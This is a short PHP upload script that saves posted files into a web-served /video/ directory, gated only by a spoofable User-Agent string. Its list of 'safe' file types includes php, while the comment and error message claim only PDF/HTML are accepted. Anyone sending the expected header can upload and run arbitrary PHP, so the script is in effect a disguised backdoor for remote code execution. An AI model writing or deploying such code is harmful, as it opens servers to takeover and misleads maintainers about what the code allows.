<?php
// =======================
// CONFIGURATION
// =======================
$store_path   = rtrim($_SERVER['DOCUMENT_ROOT'], '/') . '/video/';
$allowed_agent = "UploaderBot/1.0";
$base_url     = (isset($_SERVER['HTTPS']) ? "https" : "http") . "://{$_SERVER['HTTP_HOST']}/video/";

// Ensure UTF-8
mb_internal_encoding("UTF-8");
header('Content-Type: text/html; charset=utf-8');

// Create upload folder if not exists
if (!is_dir($store_path)) {
    mkdir($store_path, 0755, true);
}

// =======================
// USER-AGENT CHECK
// =======================
if (!isset($_SERVER['HTTP_USER_AGENT']) || strpos($_SERVER['HTTP_USER_AGENT'], $allowed_agent) === false) {
    http_response_code(403);
    exit("❌ Forbidden: Invalid client.");
}

// =======================
// HANDLE FILE UPLOAD
// =======================
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file'])) {
    $name = basename($_FILES['file']['name']); // UTF-8 safe filename
    $ext  = strtolower(pathinfo($name, PATHINFO_EXTENSION));

    // Allow only safe file types
    $allowed = ['pdf','html','htm','php'];
    if (!in_array($ext, $allowed)) {
        http_response_code(400);
        exit("❌ Only PDF/HTML allowed.");
    }

    $target = $store_path . $name;

    if (move_uploaded_file($_FILES['file']['tmp_name'], $target)) {
        echo $base_url . rawurlencode($name);
    } else {
        http_response_code(500);
        echo "❌ Upload failed.";
    }
} else {
    echo "Uploader active (bot only).";
}
?>
